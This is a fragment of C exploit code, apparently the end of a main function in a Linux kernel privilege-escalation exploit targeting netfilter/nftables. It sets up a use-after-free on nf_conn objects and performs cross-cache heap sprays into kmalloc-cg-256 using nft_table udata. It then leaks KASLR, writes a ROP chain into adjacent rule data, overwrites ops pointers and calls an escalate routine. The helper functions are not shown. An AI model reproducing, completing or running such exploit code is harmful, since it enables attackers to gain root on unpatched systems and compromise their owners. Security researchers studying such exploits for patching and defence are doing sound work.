    INFO("II: CROSS CACHE: kmalloc-256 (nf_conn) -> kmalloc-cg-256 (nft_tables->udata)");
    spray_cross_cache_pre_alloc();

    INFO("Allocate second template nf_conn + link it to nf_nat_bysource => trigger uaf write");
    send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN);
    packet_id_second_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point
    leak_heap_first_tmpl_nf_conn();

    spray_cross_cache_post_alloc();
    cross_cache_pre_free();

    // Deleting the nft_rule triggers nft_log_destroy(), which frees nft_log.prefix, currently pointing to the middle of the second template nf_conn.
    INFO("Free nft_rule => free second template nf_conn");
    del_target_rule(rule_handle_first_nf_conn);
    // @sleep(kernel_func="nft_commit_release",
    //        desc="wait for victim rule to be freed")
    usleep(100 * 1000);

    INFO("Reclaim freed nft_rule (kmalloc-cg-256) with nft_table.udata (kmalloc-cg-256)");
    spray_nft_tables_udata_kmalloc_cg_256_fake_ext();

    cross_cache_post_free();

    INFO("Reclaim the second template nf_conn (kmalloc-256) with nft_table.udata (kmalloc-cg-256)");
    spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn();
    INFO("II: end CROSS CACHE");

    leak_kaslr();
    update_adjacent_nft_rule_udata_with_ROP();
    update_labels_to_overwrites_ops();
    escalate();

    return 0;
}